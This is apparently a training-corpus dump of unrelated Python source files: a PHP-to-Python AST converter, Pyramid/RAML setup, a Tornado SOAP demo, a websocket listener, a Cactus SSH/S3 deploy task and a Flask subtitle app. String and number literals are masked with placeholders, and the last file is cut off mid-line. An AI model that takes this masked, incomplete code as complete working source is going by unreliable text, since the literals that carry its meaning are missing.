, map ( from_phpast , deblock ( node . node ) ) ) , <EOL> [ ] , ** pos ( node ) ) <EOL> if isinstance ( node , php . While ) : <EOL> return py . While ( from_phpast ( node . expr ) , <EOL> map ( to_stmt , map ( from_phpast , deblock ( node . node ) ) ) , <EOL> [ ] , ** pos ( node ) ) <EOL> if isinstance ( node , php . DoWhile ) : <EOL> condition = php . If ( php . UnaryOp ( '<STR_LIT:!>' , node . expr , lineno = node . lineno ) , <EOL> php . Break ( None , lineno = node . lineno ) , <EOL> [ ] , None , lineno = node . lineno ) <EOL> return from_phpast ( php . While ( <NUM_LIT:1> , <EOL> php . Block ( deblock ( node . node ) <EOL> + [ condition ] , <EOL> lineno = node . lineno ) , <EOL> lineno = node . lineno ) ) <EOL> if isinstance ( node , php . Try ) : <EOL> return py . TryExcept ( map ( to_stmt , map ( from_phpast , node . nodes ) ) , <EOL> [ py . ExceptHandler ( py . Name ( catch . class_ , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> store ( from_phpast ( catch . var ) ) , <EOL> map ( to_stmt , map ( from_phpast , catch . nodes ) ) , <EOL> ** pos ( node ) ) <EOL> for catch in node . catches ] , <EOL> [ ] , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . Throw ) : <EOL> return py . Raise ( from_phpast ( node . node ) , None , None , ** pos ( node ) ) <EOL> if isinstance ( node , php . Function ) : <EOL> args = [ ] <EOL> defaults = [ ] <EOL> for param in node . params : <EOL> args . append ( py . Name ( param . name [ <NUM_LIT:1> : ] , <EOL> py . Param ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) ) <EOL> if param . default is not None : <EOL> defaults . append ( from_phpast ( param . default ) ) <EOL> body = map ( to_stmt , map ( from_phpast , node . nodes ) ) <EOL> if not body : body = [ py . Pass ( ** pos ( node ) ) ] <EOL> return py . FunctionDef ( node . name , <EOL> py . arguments ( args , None , None , defaults ) , <EOL> body , [ ] , ** pos ( node ) ) <EOL> if isinstance ( node , php . Method ) : <EOL> args = [ ] <EOL> defaults = [ ] <EOL> decorator_list = [ ] <EOL> if '<STR_LIT>' in node . modifiers : <EOL> decorator_list . append ( py . Name ( '<STR_LIT>' , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) ) <EOL> args . append ( py . Name ( '<STR_LIT>' , py . Param ( ** pos ( node ) ) , ** pos ( node ) ) ) <EOL> else : <EOL> args . append ( py . Name ( '<STR_LIT>' , py . Param ( ** pos ( node ) ) , ** pos ( node ) ) ) <EOL> for param in node . params : <EOL> args . append ( py . Name ( param . name [ <NUM_LIT:1> : ] , <EOL> py . Param ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) ) <EOL> if param . default is not None : <EOL> defaults . append ( from_phpast ( param . default ) ) <EOL> body = map ( to_stmt , map ( from_phpast , node . nodes ) ) <EOL> if not body : body = [ py . Pass ( ** pos ( node ) ) ] <EOL> return py . FunctionDef ( node . name , <EOL> py . arguments ( args , None , None , defaults ) , <EOL> body , decorator_list , ** pos ( node ) ) <EOL> if isinstance ( node , php . Class ) : <EOL> name = node . name <EOL> bases = [ ] <EOL> extends = node . extends or '<STR_LIT:object>' <EOL> bases . append ( py . Name ( extends , py . Load ( ** pos ( node ) ) , ** pos ( node ) ) ) <EOL> body = map ( to_stmt , map ( from_phpast , node . nodes ) ) <EOL> for stmt in body : <EOL> if ( isinstance ( stmt , py . FunctionDef ) <EOL> and stmt . name in ( name , '<STR_LIT>' ) ) : <EOL> stmt . name = '<STR_LIT>' <EOL> if not body : body = [ py . Pass ( ** pos ( node ) ) ] <EOL> return py . ClassDef ( name , bases , body , [ ] , ** pos ( node ) ) <EOL> if isinstance ( node , ( php . ClassConstants , php . ClassVariables ) ) : <EOL> assert len ( node . nodes ) == <NUM_LIT:1> , '<STR_LIT>' <EOL> if isinstance ( node . nodes [ <NUM_LIT:0> ] , php . ClassConstant ) : <EOL> name = php . Constant ( node . nodes [ <NUM_LIT:0> ] . name , lineno = node . lineno ) <EOL> else : <EOL> name = php . Variable ( node . nodes [ <NUM_LIT:0> ] . name , lineno = node . lineno ) <EOL> initial = node . nodes [ <NUM_LIT:0> ] . initial <EOL> if initial is None : <EOL> initial = php . Constant ( '<STR_LIT:None>' , lineno = node . lineno ) <EOL> return py . Assign ( [ store ( from_phpast ( name ) ) ] , <EOL> from_phpast ( initial ) , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , ( php . FunctionCall , php . New ) ) : <EOL> if isinstance ( node . name , basestring ) : <EOL> name = py . Name ( node . name , py . Load ( ** pos ( node ) ) , ** pos ( node ) ) <EOL> else : <EOL> name = py . Subscript ( py . Call ( py . Name ( '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> [ ] , [ ] , None , None , ** pos ( node ) ) , <EOL> py . Index ( from_phpast ( node . name ) , ** pos ( node ) ) , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) <EOL> args , kwargs = build_args ( node . params ) <EOL> return py . Call ( name , args , kwargs , None , None , ** pos ( node ) ) <EOL> if isinstance ( node , php . MethodCall ) : <EOL> args , kwargs = build_args ( node . params ) <EOL> return py . Call ( py . Attribute ( from_phpast ( node . node ) , <EOL> node . name , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> args , kwargs , None , None , ** pos ( node ) ) <EOL> if isinstance ( node , php . StaticMethodCall ) : <EOL> class_ = node . class_ <EOL> if class_ == '<STR_LIT>' : class_ = '<STR_LIT>' <EOL> args , kwargs = build_args ( node . params ) <EOL> return py . Call ( py . Attribute ( py . Name ( class_ , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> node . name , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> args , kwargs , None , None , ** pos ( node ) ) <EOL> if isinstance ( node , php . StaticProperty ) : <EOL> class_ = node . node <EOL> name = node . name <EOL> if isinstance ( name , php . Variable ) : <EOL> name = name . name [ <NUM_LIT:1> : ] <EOL> return py . Attribute ( py . Name ( class_ , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> name , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) <EOL> return py . Call ( py . Name ( '<STR_LIT>' , py . Load ( ** pos ( node ) ) , ** pos ( node ) ) , <EOL> [ py . Str ( str ( node ) , ** pos ( node ) ) ] , <EOL> [ ] , None , None , ** pos ( node ) ) <EOL> def pos ( node ) : <EOL> return { '<STR_LIT>' : getattr ( node , '<STR_LIT>' , <NUM_LIT:0> ) , '<STR_LIT>' : <NUM_LIT:0> } <EOL> def store ( name ) : <EOL> name . ctx = py . Store ( ** pos ( name ) ) <EOL> return name <EOL> def deblock ( node ) : <EOL> if isinstance ( node , php . Block ) : <EOL> return node . nodes <EOL> else : <EOL> return [ node ] <EOL> def build_args ( params ) : <EOL> args = [ ] <EOL> kwargs = [ ] <EOL> for param in params : <EOL> node = from_phpast ( param . node ) <EOL> if isinstance ( node , py . Assign ) : <EOL> kwargs . append ( py . keyword ( node . targets [ <NUM_LIT:0> ] . id , node . value ) ) <EOL> else : <EOL> args . append ( node ) <EOL> return args , kwargs <EOL> def build_format ( left , right ) : <EOL> if isinstance ( left , basestring ) : <EOL> pattern , pieces = left . replace ( '<STR_LIT:%>' , '<STR_LIT>' ) , [ ] <EOL> elif isinstance ( left , php . BinaryOp ) and left . op == '<STR_LIT:.>' : <EOL> pattern , pieces = build_format ( left . left , left . right ) <EOL> else : <EOL> pattern , pieces = '<STR_LIT:%s>' , [ left ] <EOL> if isinstance ( right , basestring ) : <EOL> pattern += right . replace ( '<STR_LIT:%>' , '<STR_LIT>' ) <EOL> else : <EOL> pattern += '<STR_LIT:%s>' <EOL> pieces . append ( right ) <EOL> return pattern , pieces </s>
<s> class Result ( object ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> """<STR_LIT:U+0020>""" <EOL> self . __dict__ . update ( kwargs ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . className , self . name , self . status ) <EOL> def __repr__ ( self ) : <EOL> module_name = self . __class__ . __module__ <EOL> class_name = self . __class__ . __name__ <EOL> self_str = str ( self ) <EOL> return "<STR_LIT>" % ( module_name , class_name , self_str ) <EOL> def id ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % ( self . className , self . name ) </s>
<s> from nefertari . utils . data import * <EOL> from nefertari . utils . dictset import * <EOL> from nefertari . utils . utils import * <EOL> _split = split_strip </s>
<s> import logging <EOL> import ramlfications <EOL> from nefertari . acl import RootACL as NefertariRootACL <EOL> from nefertari . utils import dictset <EOL> log = logging . getLogger ( __name__ ) <EOL> def includeme ( config ) : <EOL> from . generators import generate_server , generate_models <EOL> Settings = dictset ( config . registry . settings ) <EOL> config . include ( '<STR_LIT>' ) <EOL> config . registry . database_acls = Settings . asbool ( '<STR_LIT>' ) <EOL> if config . registry . database_acls : <EOL> config . include ( '<STR_LIT>' ) <EOL> config . include ( '<STR_LIT>' ) <EOL> config . include ( '<STR_LIT>' ) <EOL> config . include ( '<STR_LIT>' ) <EOL> if Settings . asbool ( '<STR_LIT>' ) : <EOL> config . add_tween ( '<STR_LIT>' ) <EOL> if Settings . asbool ( '<STR_LIT>' ) : <EOL> config . add_tween ( '<STR_LIT>' ) <EOL> if Settings . asbool ( '<STR_LIT>' ) : <EOL> config . add_tween ( '<STR_LIT>' ) <EOL> if Settings . asbool ( '<STR_LIT>' ) : <EOL> config . add_tween ( '<STR_LIT>' ) <EOL> config . root_factory = NefertariRootACL <EOL> root = config . get_root_resource ( ) <EOL> root_auth = getattr ( root , '<STR_LIT>' , False ) <EOL> log . info ( '<STR_LIT>' ) <EOL> raml_root = ramlfications . parse ( Settings [ '<STR_LIT>' ] ) <EOL> log . info ( '<STR_LIT>' ) <EOL> generate_models ( config , raml_resources = raml_root . resources ) <EOL> if root_auth : <EOL> from . auth import setup_auth_policies , get_authuser_model <EOL> if getattr ( config . registry , '<STR_LIT>' , None ) is None : <EOL> config . registry . auth_model = get_authuser_model ( ) <EOL> setup_auth_policies ( config , raml_root ) <EOL> config . include ( '<STR_LIT>' ) <EOL> log . info ( '<STR_LIT>' ) <EOL> generate_server ( raml_root , config ) <EOL> log . info ( '<STR_LIT>' ) <EOL> from nefertari . engine import setup_database <EOL> setup_database ( config ) <EOL> from nefertari . elasticsearch import ES <EOL> ES . setup_mappings ( ) <EOL> if root_auth : <EOL> config . include ( '<STR_LIT>' ) <EOL> log . info ( '<STR_LIT>' ) </s>
<s> from django . contrib . gis import admin <EOL> from models import Geoname <EOL> class GeonameAdmin ( admin . OSMGeoAdmin ) : <EOL> search_fields = ( '<STR_LIT:name>' , ) <EOL> admin . site . register ( Geoname , GeonameAdmin ) </s>
<s> import tornado . httpserver <EOL> import tornado . ioloop <EOL> from tornadows import soaphandler <EOL> from tornadows import webservices <EOL> from tornadows import complextypes <EOL> from tornadows . soaphandler import webservice <EOL> """<STR_LIT>""" <EOL> class Input ( complextypes . ComplexType ) : <EOL> idList = int <EOL> class Product ( complextypes . ComplexType ) : <EOL> id = int <EOL> name = str <EOL> price = float <EOL> stock = int <EOL> class List ( complextypes . ComplexType ) : <EOL> idList = int <EOL> product = [ Product ] <EOL> class ProductListService ( soaphandler . SoapHandler ) : <EOL> @ webservice ( _params = Input , _returns = List ) <EOL> def getProductList ( self , input ) : <EOL> id = input . idList <EOL> listOfProduct = List ( ) <EOL> listOfProduct . idList = id <EOL> for i in [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ] : <EOL> reg = self . database ( i ) <EOL> output = Product ( ) <EOL> output . id = i <EOL> output . name = reg [ <NUM_LIT:0> ] <EOL> output . price = reg [ <NUM_LIT:1> ] <EOL> output . stock = reg [ <NUM_LIT:2> ] <EOL> listOfProduct . product . append ( output ) <EOL> return listOfProduct <EOL> def database ( self , id ) : <EOL> """<STR_LIT>""" <EOL> db = { <NUM_LIT:1> : ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT:100> ) , <EOL> <NUM_LIT:2> : ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> ) , <EOL> <NUM_LIT:3> : ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> ) , <EOL> <NUM_LIT:4> : ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> ) , <EOL> <NUM_LIT:5> : ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> ) , <EOL> <NUM_LIT:6> : ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> ) , <EOL> } <EOL> row = ( None , <NUM_LIT:0.0> , <NUM_LIT:0> ) <EOL> try : <EOL> row = db [ id ] <EOL> except : <EOL> None <EOL> return row <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> service = [ ( '<STR_LIT>' , ProductListService ) ] <EOL> app = webservices . WebService ( service ) <EOL> ws = tornado . httpserver . HTTPServer ( app ) <EOL> ws . listen ( <NUM_LIT> ) <EOL> tornado . ioloop . IOLoop . instance ( ) . start ( ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import logging <EOL> import time <EOL> import json <EOL> from threading import Thread <EOL> import requests <EOL> import websocket <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> WEBSOCKET_URL = '<STR_LIT>' <EOL> class Listener ( Thread , websocket . WebSocketApp ) : <EOL> def __init__ ( self , account , <EOL> on_push = None , <EOL> http_proxy_host = None , <EOL> http_proxy_port = None ) : <EOL> """<STR_LIT>""" <EOL> self . _account = account <EOL> self . _api_key = self . _account . api_key <EOL> Thread . __init__ ( self ) <EOL> websocket . WebSocketApp . __init__ ( self , WEBSOCKET_URL + self . _api_key , <EOL> on_open = self . on_open , <EOL> on_message = self . on_message , <EOL> on_close = self . on_close ) <EOL> self . connected = False <EOL> self . last_update = time . time ( ) <EOL> self . on_push = on_push <EOL> self . history = None <EOL> self . clean_history ( ) <EOL> self . http_proxy_host = http_proxy_host <EOL> self . http_proxy_port = http_proxy_port <EOL> self . proxies = None <EOL> if http_proxy_port is not None and http_proxy_port is not None : <EOL> self . proxies = { <EOL> "<STR_LIT:http>" : "<STR_LIT>" + http_proxy_host + "<STR_LIT::>" + str ( http_proxy_port ) , <EOL> "<STR_LIT>" : "<STR_LIT>" + http_proxy_host + "<STR_LIT::>" + str ( http_proxy_port ) , <EOL> } <EOL> def clean_history ( self ) : <EOL> self . history = [ ] <EOL> def on_open ( self , ws ) : <EOL> self . connected = True <EOL> self . last_update = time . time ( ) <EOL> def on_close ( self , ws ) : <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . connected = False <EOL> def on_message ( self , ws , message ) : <EOL> log . debug ( '<STR_LIT>' + message ) <EOL> try : <EOL> json_message = json . loads ( message ) <EOL> if json_message [ "<STR_LIT:type>" ] != "<STR_LIT>" : <EOL> self . on_push ( json_message ) <EOL> except Exception as e : <EOL> logging . exception ( e ) <EOL> def run_forever ( self , sockopt = None , sslopt = None , ping_interval = <NUM_LIT:0> , ping_timeout = None ) : <EOL> websocket . WebSocketApp . run_forever ( self , sockopt = sockopt , sslopt = sslopt , ping_interval = ping_interval , <EOL> ping_timeout = ping_timeout , <EOL> http_proxy_host = self . http_proxy_host , <EOL> http_proxy_port = self . http_proxy_port ) <EOL> def run ( self ) : <EOL> self . run_forever ( ) </s>
<s> import fnmatch <EOL> import logging <EOL> import getpass <EOL> import boto <EOL> import sys <EOL> from cactus . s3 . utils import fileList <EOL> import re <EOL> import os <EOL> import paramiko <EOL> import yaml <EOL> from . import BaseTask <EOL> from cactus . s3 . file import File <EOL> from paramiko import SFTPClient <EOL> from cactus . utils import to_unix_path <EOL> class DeployTask ( BaseTask ) : <EOL> """<STR_LIT>""" <EOL> local_settings = { } <EOL> config = { } <EOL> helptext_short = "<STR_LIT>" "<STR_LIT>" <EOL> @ classmethod <EOL> def conf ( cls , key , default = None ) : <EOL> return cls . local_settings . get ( key , cls . config . get ( key , default ) ) <EOL> @ classmethod <EOL> def run ( cls , * args , ** kwargs ) : <EOL> if len ( args ) > <NUM_LIT:3> : <EOL> print cls . usage ( ) <EOL> return <EOL> do_build = True <EOL> run_tests = False <EOL> target = "<STR_LIT:default>" <EOL> for arg in args : <EOL> m1 = re . match ( r'<STR_LIT>' , arg , re . I ) <EOL> m2 = re . match ( r'<STR_LIT>' , arg , re . I ) <EOL> if m1 : <EOL> do_build = m1 . group ( <NUM_LIT:1> ) . lower ( ) == "<STR_LIT:yes>" <EOL> elif m2 : <EOL> run_tests = m2 . group ( <NUM_LIT:1> ) . lower ( ) == "<STR_LIT:yes>" <EOL> else : <EOL> target = arg <EOL> try : <EOL> cls . local_settings = yaml . load ( <EOL> open ( os . path . join ( os . getcwd ( ) , "<STR_LIT>" ) , '<STR_LIT:r>' ) <EOL> ) . get ( target ) <EOL> except Exception , e : <EOL> cls . local_settings = { } <EOL> logging . warn ( "<STR_LIT>" . format ( e ) ) <EOL> from cactus import site as cactus_site <EOL> site = cactus_site . Site ( os . getcwd ( ) ) <EOL> site . verify ( ) <EOL> cls . config = site . config . get ( "<STR_LIT>" ) . get ( target , "<STR_LIT:default>" ) <EOL> deployment_type = cls . conf ( "<STR_LIT:type>" , "<STR_LIT>" ) <EOL> discard_files = cls . conf ( "<STR_LIT>" , [ ] ) <EOL> def createSSHClient ( server , port = <NUM_LIT> , user = None , password = None , privkey = None ) : <EOL> client = paramiko . SSHClient ( ) <EOL> client . load_system_host_keys ( ) <EOL> client . set_missing_host_key_policy ( paramiko . AutoAddPolicy ( ) ) <EOL> client . connect ( <EOL> server , <EOL> port = port , <EOL> username = user , <EOL> password = password , <EOL> key_filename = privkey , <EOL> ) <EOL> return client <EOL> if do_build or run_tests : <EOL> print "<STR_LIT>" <EOL> site . build ( dist = True ) <EOL> site . call_plugin_method ( "<STR_LIT>" ) <EOL> if run_tests : <EOL> if not site . run_tests ( ) : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> print u"<STR_LIT>" . format ( target ) <EOL> if deployment_type == "<STR_LIT>" : <EOL> host = cls . conf ( "<STR_LIT:host>" ) <EOL> port = int ( cls . conf ( "<STR_LIT:port>" , <NUM_LIT> ) ) <EOL> print "<STR_LIT>" . format ( host ) <EOL> auth_type = cls . conf ( "<STR_LIT>" , "<STR_LIT:password>" ) <EOL> try : <EOL> from win32com . shell import shellcon , shell <EOL> homedir = shell . SHGetFolderPath ( <NUM_LIT:0> , shellcon . CSIDL_APPDATA , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> except ImportError : <EOL> homedir = os . path . expanduser ( "<STR_LIT>" ) <EOL> if auth_type == "<STR_LIT>" : <EOL> try : <EOL> ssh = createSSHClient ( <EOL> host , <EOL> port = port , <EOL> user = cls . conf ( "<STR_LIT:user>" ) , <EOL> privkey = cls . conf ( "<STR_LIT>" , "<STR_LIT>" ) . format ( home = homedir ) , <EOL> ) <EOL> except paramiko . PasswordRequiredException : <EOL> ssh = createSSHClient ( <EOL> host , <EOL> port = port , <EOL> user = cls . conf ( "<STR_LIT:user>" ) , <EOL> privkey = cls . conf ( "<STR_LIT>" , "<STR_LIT>" ) . format ( home = homedir ) , <EOL> password = getpass . getpass ( prompt = "<STR_LIT>" ) , <EOL> ) <EOL> else : <EOL> user = cls . conf ( "<STR_LIT:user>" ) <EOL> if not user : <EOL> user = raw_input ( "<STR_LIT>" ) <EOL> ssh = createSSHClient ( <EOL> host , <EOL> port = port , <EOL> user = user , <EOL> password = getpass . getpass ( prompt = "<STR_LIT>" ) <EOL> ) <EOL> scp = SFTPClient . from_transport ( ssh . get_transport ( ) ) <EOL> dist_dir = os . path . abspath ( site . paths [ '<STR_LIT>' ] ) <EOL> remote_base = cls . conf ( "<STR_LIT:path>" ) <EOL> for ( path , dirs , files ) in os . walk ( dist_dir ) : <EOL> remote_path = path . replace ( dist_dir , '<STR_LIT>' ) <EOL> remote_path = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , remote_path ) <EOL> remote_path = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , remote_path ) <EOL> for d in dirs : <EOL> rdir = to_unix_path ( os . path . join ( remote_base , remote_path , d ) ) <EOL> try : <EOL> scp . stat ( rdir ) <EOL> except IOError : <EOL> scp . mkdir ( rdir ) <EOL> for f in files : <EOL> src = os . path . abspath ( os . path . join ( path , f ) ) <EOL> dest = to_unix_path ( os . path . join ( remote_base , remote_path , f ) ) <EOL> discard = False <EOL> for pattern in discard_files : <EOL> d = "<STR_LIT>" . format ( pattern ) <EOL> if fnmatch . fnmatch ( dest , d ) : <EOL> discard = True <EOL> if not discard : <EOL> logging . info ( "<STR_LIT>" . format ( src , dest ) ) <EOL> scp . put ( <EOL> src , <EOL> dest <EOL> ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" . format ( src ) ) <EOL> site . call_plugin_method ( "<STR_LIT>" ) <EOL> elif deployment_type == "<STR_LIT>" : <EOL> key = cls . conf ( "<STR_LIT>" ) <EOL> secret = cls . conf ( "<STR_LIT>" ) <EOL> if not key : <EOL> key = raw_input ( "<STR_LIT>" ) <EOL> if not secret : <EOL> secret = raw_input ( "<STR_LIT>" ) <EOL> connection = boto . connect_s3 ( key . strip ( ) , secret . strip ( ) ) <EOL> try : <EOL> buckets = connection . get_all_buckets ( ) <EOL> except : <EOL> logging . error ( '<STR_LIT>' ) <EOL> return <EOL> bucket = cls . conf ( "<STR_LIT>" ) <EOL> if not bucket : <EOL> bucket = raw_input ( "<STR_LIT>" ) . strip ( ) . lower ( ) <EOL> if bucket not in [ b . name for b in buckets ] : <EOL> if raw_input ( '<STR_LIT>' ) == '<STR_LIT:y>' : <EOL> try : <EOL> created_bucket = connection . create_bucket ( bucket , policy = '<STR_LIT>' ) <EOL> except boto . exception . S3CreateError , e : <EOL> logging . error ( '<STR_LIT>' . format ( bucket ) ) <EOL> return <EOL> created_bucket . configure_website ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> buckets = connection . get_all_buckets ( ) <EOL> except : <EOL> logging . error ( '<STR_LIT>' ) <EOL> return <EOL> selected_bucket = None <EOL> for b in buckets : <EOL> if b . name == bucket : <EOL> selected_bucket = b <EOL> if selected_bucket : <EOL> dist_dir = site . paths [ '<STR_LIT>' ] <EOL> for f in fileList ( dist_dir , relative = True ) : <EOL> s3_file = File ( site , f , cls . conf ( "<STR_LIT>" ) ) <EOL> discard = False <EOL> for pattern in discard_files : <EOL> if fnmatch . fnmatch ( f , pattern ) : <EOL> discard = True <EOL> if not discard : <EOL> s3_file . upload ( selected_bucket ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" . format ( f ) ) <EOL> site . call_plugin_method ( "<STR_LIT>" ) <EOL> logging . info ( "<STR_LIT>" . format ( cls . conf ( "<STR_LIT>" ) ) ) <EOL> else : <EOL> logging . warn ( "<STR_LIT>" . format ( deployment_type ) ) </s>
<s> import sublime_plugin <EOL> class ProjectManagerCloseWindow ( sublime_plugin . WindowCommand ) : <EOL> def run ( self ) : <EOL> if self . window . project_file_name ( ) : <EOL> self . window . run_command ( '<STR_LIT>' ) <EOL> else : <EOL> self . window . run_command ( '<STR_LIT>' ) <EOL> if any ( [ v . is_dirty ( ) for v in self . window . views ( ) ] ) : <EOL> return <EOL> self . window . run_command ( '<STR_LIT>' ) <EOL> self . window . run_command ( '<STR_LIT>' ) </s>
<s> from unittest import suite <EOL> class DeferrableTestSuite ( suite . TestSuite ) : <EOL> r'''<STR_LIT>''' <EOL> def run ( self , result , debug = False ) : <EOL> topLevel = False <EOL> if getattr ( result , '<STR_LIT>' , False ) is False : <EOL> result . _testRunEntered = topLevel = True <EOL> for test in self : <EOL> if result . shouldStop : <EOL> break <EOL> if suite . _isnotsuite ( test ) : <EOL> self . _tearDownPreviousClass ( test , result ) <EOL> yield <EOL> self . _handleModuleFixture ( test , result ) <EOL> yield <EOL> self . _handleClassSetUp ( test , result ) <EOL> yield <EOL> result . _previousTestClass = test . __class__ <EOL> if ( getattr ( test . __class__ , '<STR_LIT>' , False ) or <EOL> getattr ( result , '<STR_LIT>' , False ) ) : <EOL> continue <EOL> if not debug : <EOL> deferred = test ( result ) <EOL> if deferred is not None and hasattr ( deferred , '<STR_LIT>' ) : <EOL> for x in deferred : <EOL> yield x <EOL> else : <EOL> deferred = test . debug ( ) <EOL> if deferred is not None and hasattr ( deferred , '<STR_LIT>' ) : <EOL> for x in deferred : <EOL> yield x <EOL> yield <EOL> if topLevel : <EOL> self . _tearDownPreviousClass ( None , result ) <EOL> yield <EOL> self . _handleModuleTearDown ( result ) <EOL> yield <EOL> result . _testRunEntered = False </s>
<s> from flask import render_template , redirect , flash , current_app , url_for , session , jsonify , request , Response <EOL> from flask . ext . babel import gettext <EOL> from werkzeug . contrib . cache import SimpleCache <EOL> import os <EOL> import urllib <EOL> import gzip <EOL> import requests <EOL> import StringIO <EOL> import re <EOL> import xmlrpclib <EOL> from os_util import OSFile <EOL> from . import mod <EOL> cache = SimpleCache ( ) <EOL> OST_API = '<STR_LIT>' <EOL> OST_USERAGENT = '<STR_LIT>' <EOL> @ mod . route ( '<STR_LIT:/>' ) <EOL> def index ( ) : <EOL> if not os . path . isdir ( current_app . config [ '<STR_LIT>' ] ) : <EOL> flash ( gettext ( "<STR_LIT>" , directory = directory ) ) <EOL> return redirect ( "<STR_LIT:/>" ) <EOL> return render_template ( '<STR_LIT>' , movies = get_movies ( ) ) <EOL> @ mod . route ( '<STR_LIT>' ) <EOL> def refresh ( ) : <EOL> cache . set ( '<STR_LIT>' , None , timeout = <NUM_LIT:7> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) <EOL> @ mod . route ( '<STR_LIT>' ) <EOL> def player ( ) : <EOL> return render_template ( '<STR_LIT>' ) <EOL> @ mod . route ( '<STR_LIT>' ) <EOL> def control ( ) : <EOL> return render_template ( '<STR_LIT>' , movies = get_movies ( ) ) <EOL> @ mod . route ( '<STR_LIT>' ) <EOL> def find_subtitles ( ) : <EOL> rel_path = request . args . get ( '<STR_LIT:src>' ) [ len ( current_app . config [ "<STR_LIT>" ] ) + <NUM_LIT:1> : ] <EOL> json = cache . get ( rel_path ) <EOL> if json == None : <EOL> path = os . path . join ( <EOL> current_app . config [ '<STR_LIT>' ] , <EOL> urllib . unquote ( rel_path ) . decode ( '<STR_LIT:utf8>' ) <EOL> ) <EOL> subtitles = [ ] <EOL> results = os_search ( path ) <EOL> try : <EOL> for sub in results : <EOL> if sub [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> subtitles . append ( { <EOL> '<STR_LIT:url>' : sub [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : sub [ '<STR_LIT>' ] , <EOL> '<STR_LIT:name>' : sub [ '<STR_LIT>' ] <EOL> } ) <EOL> except TypeError : <EOL> pass <EOL> json = jsonify ( <EOL> subtitles = subtitles <EOL> ) <EOL> cache . set ( rel_path , json , timeout = <NUM_LIT:7> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) <EOL> return json <EOL> @ mod . route ( "<STR_LIT>" ) <EOL> def subtitle_proxy ( ) : <EOL> src = request . args . get ( '<STR_LIT:src>' ) <EOL> vtt = cache . get ( src ) <EOL> if vtt == None : <EOL> r = requests . get ( src ) <EOL> gzipped = StringIO . StringIO ( r . content ) <EOL> gzipped . seek ( <NUM_LIT:0> ) <EOL> srt = gzip . GzipFile ( fileobj = gzipped , mode = '<STR_LIT:rb>' ) <EOL> vtt = srt_to_vtt ( srt . read ( ) ) <EOL> cache . set ( src , vtt , timeout = <NUM_LIT:7> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) <EOL> return Response ( vtt , mimetype = '<STR_LIT>' ) <EOL> def os_search ( path ) : <EOL> xmlrpc , token = os_connect ( ) <EOL> xmlrpclib . Marshaller . dispatch [ type ( <NUM_LIT:0> L ) ] = lambda _ , v , w : w ( "<STR_LIT>" % v ) <EOL> os_file = OSFile ( path ) <EOL> query = xmlrpc . SearchSubtitles ( token , [ <EOL> { <EOL> '<STR_LIT>' : current_app . config [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : os_file . hash_file ( ) , <EOL> '<STR_LIT>' : os_file . size , <EOL> } <EOL> ] ) <EOL> if len ( query . get ( '<STR_LIT:data>' ) ) > <NUM_LIT:0> : <EOL> return query . get ( '<STR_LIT:data>' ) <EOL> filename = os . path . splitext ( os . path . basename ( path ) ) [ <NUM_LIT:0> ] . replace ( "<STR_LIT:.>" , "<STR_LIT:U+0020>" ) <EOL> query = xmlrpc . SearchSubtitles ( token , [ <EOL> { <EOL> '<STR_LIT>' : current_app . config [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : filename , <EOL> } <EOL> ] ) <EOL> return query . get ( '<STR_LIT:data>' ) <EOL> def os_connect ( ) : <EOL> xmlrpc = xmlrpclib . ServerProxy ( OST_API , allow_none = True ) <EOL> login = xmlrpc . LogIn ( <EOL> current_app . config [ '<STR_LIT>' ] , <EOL> current_app . config [ '<STR_LIT>' ] , <EOL> "<STR_LIT>" , <EOL> OST_USERAGENT <EOL> ) <EOL> if login . get ( '<STR_LIT:status>' ) == '<STR_LIT>' : <EOL> return ( xmlrpc , login . get ( '<STR_LIT>' ) ) <EOL> def srt_to_vtt ( srt ) : <EOL> vtt = "<STR_LIT>" <EOL> vtt += re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , srt ) <EOL> return vtt <EOL> def get_movies ( ) : <EOL> movies = cache . get ( "<STR_LIT>" ) <EOL> if movies is None : <EOL> movies = find_movies ( 